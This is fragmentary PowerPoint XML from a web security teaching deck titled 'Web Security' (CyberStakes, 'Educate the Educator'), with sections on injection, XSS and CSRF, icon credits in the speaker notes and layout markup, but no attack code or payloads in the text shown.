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67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7"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId78"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="595" r:id="rId2"/>
    <p:sldId id="545" r:id="rId3"/>
    <p:sldId id="544" r:id="rId4"/>
    <p:sldId id="548" r:id="rId5"/>
    <p:sldId id="547" r:id="rId6"/>
    <p:sldId id="407" r:id="rId7"/>
    <p:sldId id="551" r:id="rId8"/>
    <p:sldId id="433" r:id="rId9"/>
    <p:sldId id="434" r:id="rId10"/>
    <p:sldId id="437" r:id="rId11"/>
    <p:sldId id="438" r:id="rId12"/>
    <p:sldId id="474" r:id="rId13"/>
    <p:sldId id="599" r:id="rId14"/>
    <p:sldId id="600" r:id="rId15"/>
    <p:sldId id="601" r:id="rId16"/>
    <p:sldId id="458" r:id="rId17"/>
    <p:sldId id="443" r:id="rId18"/>
    <p:sldId id="444" r:id="rId19"/>
    <p:sldId id="442" r:id="rId20"/>
    <p:sldId id="445" r:id="rId21"/>
    <p:sldId id="446" r:id="rId22"/>
    <p:sldId id="448" r:id="rId23"/>
    <p:sldId id="453" r:id="rId24"/>
    <p:sldId id="454" r:id="rId25"/>
    <p:sldId id="455" r:id="rId26"/>
    <p:sldId id="452" r:id="rId27"/>
    <p:sldId id="461" r:id="rId28"/>
    <p:sldId id="537" r:id="rId29"/>
    <p:sldId id="525" r:id="rId30"/>
    <p:sldId id="526" r:id="rId31"/>
    <p:sldId id="528" r:id="rId32"/>
    <p:sldId id="529" r:id="rId33"/>
    <p:sldId id="597" r:id="rId34"/>
    <p:sldId id="555" r:id="rId35"/>
    <p:sldId id="540" r:id="rId36"/>
    <p:sldId id="556" r:id="rId37"/>
    <p:sldId id="557" r:id="rId38"/>
    <p:sldId id="596" r:id="rId39"/>
    <p:sldId id="598" r:id="rId40"/>
    <p:sldId id="543" r:id="rId41"/>
    <p:sldId id="408" r:id="rId42"/>
    <p:sldId id="485" r:id="rId43"/>
    <p:sldId id="487" r:id="rId44"/>
    <p:sldId id="493" r:id="rId45"/>
    <p:sldId id="471" r:id="rId46"/>
    <p:sldId id="475" r:id="rId47"/>
    <p:sldId id="477" r:id="rId48"/>
    <p:sldId id="476" r:id="rId49"/>
    <p:sldId id="480" r:id="rId50"/>
    <p:sldId id="483" r:id="rId51"/>
    <p:sldId id="482" r:id="rId52"/>
    <p:sldId id="484" r:id="rId53"/>
    <p:sldId id="481" r:id="rId54"/>
    <p:sldId id="494" r:id="rId55"/>
    <p:sldId id="495" r:id="rId56"/>
    <p:sldId id="532" r:id="rId57"/>
    <p:sldId id="558" r:id="rId58"/>
    <p:sldId id="496" r:id="rId59"/>
    <p:sldId id="473" r:id="rId60"/>
    <p:sldId id="497" r:id="rId61"/>
    <p:sldId id="559" r:id="rId62"/>
    <p:sldId id="472" r:id="rId63"/>
    <p:sldId id="503" r:id="rId64"/>
    <p:sldId id="499" r:id="rId65"/>
    <p:sldId id="560" r:id="rId66"/>
    <p:sldId id="562" r:id="rId67"/>
    <p:sldId id="561" r:id="rId68"/>
    <p:sldId id="409" r:id="rId69"/>
    <p:sldId id="509" r:id="rId70"/>
    <p:sldId id="572" r:id="rId71"/>
    <p:sldId id="573" r:id="rId72"/>
    <p:sldId id="513" r:id="rId73"/>
    <p:sldId id="514" r:id="rId74"/>
    <p:sldId id="289" r:id="rId75"/>
    <p:sldId id="387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AEE1610-0505-CA4A-BCC7-AA58FD6B1707}">
          <p14:sldIdLst>
            <p14:sldId id="595"/>
            <p14:sldId id="545"/>
            <p14:sldId id="544"/>
            <p14:sldId id="548"/>
            <p14:sldId id="547"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="injection" id="{04222959-40F8-2A4F-B0F4-0100C1BB1A5E}">
          <p14:sldIdLst>
            <p14:sldId id="407"/>
            <p14:sldId id="551"/>
            <p14:sldId id="433"/>
            <p14:sldId id="434"/>
            <p14:sldId id="437"/>
            <p14:sldId id="438"/>
            <p14:sldId id="474"/>
            <p14:sldId id="599"/>
            <p14:sldId id="600"/>
            <p14:sldId id="601"/>
            <p14:sldId id="458"/>
            <p14:sldId id="443"/>
            <p14:sldId id="444"/>
            <p14:sldId id="442"/>
            <p14:sldId id="445"/>
            <p14:sldId id="446"/>
            <p14:sldId id="448"/>
            <p14:sldId id="453"/>
            <p14:sldId id="454"/>
            <p14:sldId id="455"/>
            <p14:sldId id="452"/>
            <p14:sldId id="461"/>
            <p14:sldId id="537"/>
            <p14:sldId id="525"/>
            <p14:sldId id="526"/>
            <p14:sldId id="528"/>
            <p14:sldId id="529"/>
            <p14:sldId id="597"/>
            <p14:sldId id="555"/>
            <p14:sldId id="540"/>
            <p14:sldId id="556"/>
            <p14:sldId id="557"/>
            <p14:sldId id="596"/>
            <p14:sldId id="598"/>
            <p14:sldId id="543"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS" id="{0A3C25CD-A08A-3E49-BC32-AF4EB0DB42B2}">
          <p14:sldIdLst>
            <p14:sldId id="408"/>
            <p14:sldId id="485"/>
            <p14:sldId id="487"/>
            <p14:sldId id="493"/>
            <p14:sldId id="471"/>
            <p14:sldId id="475"/>
            <p14:sldId id="477"/>
            <p14:sldId id="476"/>
            <p14:sldId id="480"/>
            <p14:sldId id="483"/>
            <p14:sldId id="482"/>
            <p14:sldId id="484"/>
            <p14:sldId id="481"/>
            <p14:sldId id="494"/>
            <p14:sldId id="495"/>
            <p14:sldId id="532"/>
            <p14:sldId id="558"/>
            <p14:sldId id="496"/>
            <p14:sldId id="473"/>
            <p14:sldId id="497"/>
            <p14:sldId id="559"/>
            <p14:sldId id="472"/>
            <p14:sldId id="503"/>
            <p14:sldId id="499"/>
            <p14:sldId id="560"/>
            <p14:sldId id="562"/>
            <p14:sldId id="561"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CSRF" id="{67664588-4A76-E242-B1AD-2DCB40B40068}">
          <p14:sldIdLst>
            <p14:sldId id="409"/>
            <p14:sldId id="509"/>
            <p14:sldId id="572"/>
            <p14:sldId id="573"/>
            <p14:sldId id="513"/>
            <p14:sldId id="514"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusion" id="{9261A7F0-4603-054A-9F9B-B1F21EA47009}">
          <p14:sldIdLst>
            <p14:sldId id="289"/>
            <p14:sldId id="38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orient="horz" pos="1440">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="19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verick Woo" initials="ma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FF"/>
    <a:srgbClr val="717BFF"/>
    <a:srgbClr val="3F5842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D1E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="866C49"/>
    <a:srgbClr val="79463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1" autoAdjust="0"/>
    <p:restoredTop sz="86098" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="-1592" y="-112"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1440"/>
        <p:guide pos="3840"/>
        <p:guide pos="1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9" d="100"/>
        <a:sy n="59" d="100"/>
      </p:scale>
      <p:origin x="0" y="1936"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="-404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commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId84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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin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81C90-955A-E944-AB32-466E55900D6A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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8D97-067E-974E-BD5D-FA8C0988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19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EA11A-7C1A-F544-A99B-661F38A45889}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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A8A3-9FBB-431D-AAA8-BEEA360F5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66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13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from Web Application Hacker’s Handbook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98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from Web Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>Hacker’s Handbook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03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49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2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2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2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2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2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83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0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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r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="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun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84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example taken from Web Application Hacker’s Handbook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97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="http://thenounproject.com/noun/shock/#icon-No6840" target="_blank"&gt;Shock&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jimlears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;Jim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Lears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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83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13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="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>thenounproject.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>thenounproject.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun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16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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r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="http://thenounproject.com/noun/happy/#icon-No3060" target="_blank"&gt;Happy&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tobiasfabian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;Tobias F. Wolf&lt;/a&gt; from The Noun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7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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun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10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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r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="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun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16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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r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="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun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1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2B3FC-2135-4E26-9C94-50F8F163901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04" y="4342789"/>
            <a:ext cx="5485794" cy="4115106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4086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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r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="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun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0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tags" Target="../tags/tag55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50.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag59.xml"/><Relationship Id="rId5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56.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag64.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65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61.xml"/><Relationship Id="rId2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tags" Target="../tags/tag15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tags" Target="../tags/tag20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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3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41.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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44.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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+mj-lt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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj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FA2AE38F-F663-7942-B079-5005BA0BDF98}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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9C206F0-989F-EB47-9ADF-69E14BBCA2C4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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3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5B7867C-8937-A54F-BAEE-445098FFEF8A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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15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E2076C5-CD0F-8E46-ABC4-9EABE219C92B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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4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5379D80-A8B0-C443-BFE8-6E9F37773209}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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57200" y="3034508"/>
            <a:ext cx="6951274" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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92724" y="1524000"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="b" anchorCtr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6757E5B-C539-4546-894F-EB0786D60B50}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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264380" y="2013343"/>
            <a:ext cx="6951274" cy="753670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Section Header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64380" y="2919413"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"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FF059461-0FFD-CF49-A98A-09B0AEA4D5FF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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9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447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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CCEE-A76B-F34C-A05F-2F1994D60204}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/8/14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2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446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1981200"/>
            <a:ext cx="4040188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446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1981200"/>
            <a:ext cx="4041775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21557A61-675D-5A4C-8099-956071C6A9AA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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FC88AAD4-BEBB-AE48-AF6A-5D0E05A49B41}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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7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41EE10F8-3DB7-9B44-B7CC-65AF664A5F6D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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082D1B10-278B-5146-B66A-B6028DFB770B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/8/14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0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1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4.xml"/><Relationship Id="rId18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76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5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A271CCEE-A76B-F34C-A05F-2F1994D60204}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/8/14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5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fld id="{B747839D-A323-47F3-909F-548499399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0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 spc="-50" normalizeH="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Cambria"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="292100" indent="-2921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Calibri"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="635000" indent="-29210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Calibri"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="9144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Calibri"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial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Calibri"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1320800" indent="-1778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png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag66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6" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpeg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.emf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3.emf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9.emf"/><Relationship Id="rId7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3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3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3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3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9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3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24.emf"/><Relationship Id="rId8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e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tags" Target="../tags/tag6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752600" y="3263471"/>
            <a:ext cx="6477000" cy="654313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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b="1" dirty="0" smtClean="0"/>
              <a:t>Web Security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1600" y="2564880"/>
            <a:ext cx="45719" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect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2308" y="2730851"/>
            <a:ext cx="1083329" cy="1115858"/>
            <a:chOff x="252308" y="2855212"/>
            <a:chExt cx="1083329" cy="1115858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="CYBERSTAKES_LOGO_Black-djb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955" y="2855212"/>
              <a:ext cx="768035" cy="86713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252308" y="3724849"/>
              <a:ext cx="1083329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sz="1600" dirty="0" smtClean="0"/>
                <a:t>CyberStakes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752600" y="3974068"/>
            <a:ext cx="2821285" cy="36933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dirty="0" smtClean="0"/>
              <a:t>Educate the Educator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5148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10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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="474044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123908" y="2133600"/>
            <a:ext cx="4740442" cy="698847"/>
            <a:chOff x="2123908" y="2965450"/>
            <a:chExt cx="4740442" cy="698847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr/>
